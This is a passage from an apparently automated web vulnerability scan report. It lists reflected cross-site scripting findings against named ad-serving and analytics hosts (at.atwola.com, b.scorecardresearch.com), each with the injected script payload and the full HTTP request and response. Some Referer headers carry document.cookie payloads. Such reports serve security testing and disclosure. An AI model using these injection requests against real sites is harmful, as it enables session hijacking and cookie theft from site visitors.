Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93220029;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93220029;target=_blank;aduho=-360;grp=24244844;misc=24244844c6861"><script>alert(1)</script>ad0c3bcb1e7;adiframe=y">
...[SNIP]...

1.52. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48ed2"><script>alert(1)</script>a7413131d8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe48ed2"><script>alert(1)</script>a7413131d8b/3.0/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn48ed2"><script>alert(1)</script>a7413131d8b/3.0/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

1.53. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a33b"><script>alert(1)</script>d2b240b8cbd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.08a33b"><script>alert(1)</script>d2b240b8cbd/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.08a33b"><script>alert(1)</script>d2b240b8cbd/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

1.54. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf8ec"><script>alert(1)</script>b39abb6cf7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1cf8ec"><script>alert(1)</script>b39abb6cf7/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 228

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1cf8ec"><script>alert(1)</script>b39abb6cf7/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

1.55. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984e3"><script>alert(1)</script>381ff05b531 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794984e3"><script>alert(1)</script>381ff05b531/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794984e3"><script>alert(1)</script>381ff05b531/0/-1/size=300x250;adiframe=y">
...[SNIP]...

1.56. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7efe"><script>alert(1)</script>184e0a940d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0e7efe"><script>alert(1)</script>184e0a940d6/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0e7efe"><script>alert(1)</script>184e0a940d6/-1/size=300x250;adiframe=y">
...[SNIP]...

1.57. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c147"><script>alert(1)</script>c56f6924a19 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-17c147"><script>alert(1)</script>c56f6924a19/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-17c147"><script>alert(1)</script>c56f6924a19/size=300x250;adiframe=y">
...[SNIP]...

1.58. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30bcd"><script>alert(1)</script>adc7d40215f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size30bcd"><script>alert(1)</script>adc7d40215f=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size30bcd"><script>alert(1)</script>adc7d40215f=300x250;adiframe=y">
...[SNIP]...

1.59. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9149d"><script>alert(1)</script>622ffc05fe8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250?9149d"><script>alert(1)</script>622ffc05fe8=1 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ=; CfP=1; ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 232

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250?9149d"><script>alert(1)</script>622ffc05fe8=1;adiframe=y">
...[SNIP]...

1.60. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c98c6"><script>alert(1)</script>3c3af206613 was submitted in the noperf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305907;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93305907;target=_blank;aduho=-360;grp=24244844;misc=24244844c98c6"><script>alert(1)</script>3c3af206613 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.bloggingstocks.com/?f020e%22-alert(document.cookie)-%22014356e96ab=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; CfP=1; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; AxData=1#60488; Axxd=1; ATTAC=a3ZzZWc9OTk5OTk6NTAwMTI6NTExMzM6NTExODQ6NTI2MTE6NTI2MTU6NTI5NDc6NTM1NzU6NTQ0OTA6NTQ4OTg6NTQ5Mzg6NTQ5NTQ6NTY0MzI6NTY1NTU6NTY3MzI6NTY3MzM6NTY3ODA6NjA0MjU6NjA0ODg6NjA0OTA6NjA0OTE6NjA1MDY6NjA3Mzk6NjE2NzQ6NTAyMTM6NTAyMjA6NTAyMDQ6NTAyMzc6NTAyMjg6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 367

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305907;cfp=1;noaddonpl=y;kvpg=bloggingstocks;kvugc=0;kvmn=93305907;target=_blank;aduho=-360;grp=24244844;misc=24244844c98c6"><script>alert(1)</script>3c3af206613;adiframe=y">
...[SNIP]...

1.61. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 3e4b0<script>alert(1)</script>3fe39883e3 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=83e4b0<script>alert(1)</script>3fe39883e3&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 13 Feb 2011 20:36:59 GMT
Date: Sun, 06 Feb 2011 20:36:59 GMT
Connection: close
Content-Length: 3608

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"83e4b0<script>alert(1)</script>3fe39883e3", c2:"3005693", c3:"1", c4:"http://www.electronista.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.62. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 3ded5<script>alert(1)</script>e6bec28e3dd was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=3ded5<script>alert(1)</script>e6bec28e3dd&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 13 Feb 2011 20:37:01 GMT
Date: Sun, 06 Feb 2011 20:37:01 GMT
Connection: close
Content-Length: 3609

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.electronista.com/", c5:"", c6:"", c10:"3ded5<script>alert(1)</script>e6bec28e3dd", c15:"", c16:"", r:""});

1.63. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 60671<script>alert(1)</script>5eb3a0cba51 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=&c15=60671<script>alert(1)</script>5eb3a0cba51 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 13 Feb 2011 20:37:02 GMT
Date: Sun, 06 Feb 2011 20:37:02 GMT
Connection: close
Content-Length: 3609

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
OMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.electronista.com/", c5:"", c6:"", c10:"", c15:"60671<script>alert(1)</script>5eb3a0cba51", c16:"", r:""});

1.64. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload d53a2<script>alert(1)</script>9cc82d916a8 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693d53a2<script>alert(1)</script>9cc82d916a8&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 13 Feb 2011 20:37:00 GMT
Date: Sun, 06 Feb 2011 20:37:00 GMT
Connection: close
Content-Length: 3609

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693d53a2<script>alert(1)</script>9cc82d916a8", c3:"1", c4:"http://www.electronista.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.65. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 68b81<script>alert(1)</script>efcbb2330ca was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=168b81<script>alert(1)</script>efcbb2330ca&c4=http%3A%2F%2Fwww.electronista.com%2F&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 13 Feb 2011 20:37:00 GMT
Date: Sun, 06 Feb 2011 20:37:00 GMT
Connection: close
Content-Length: 3609

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"3005693", c3:"168b81<script>alert(1)</script>efcbb2330ca", c4:"http://www.electronista.com/", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.66. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 19807<script>alert(1)</script>acb3208d838 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.electronista.com%2F19807<script>alert(1)</script>acb3208d838&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
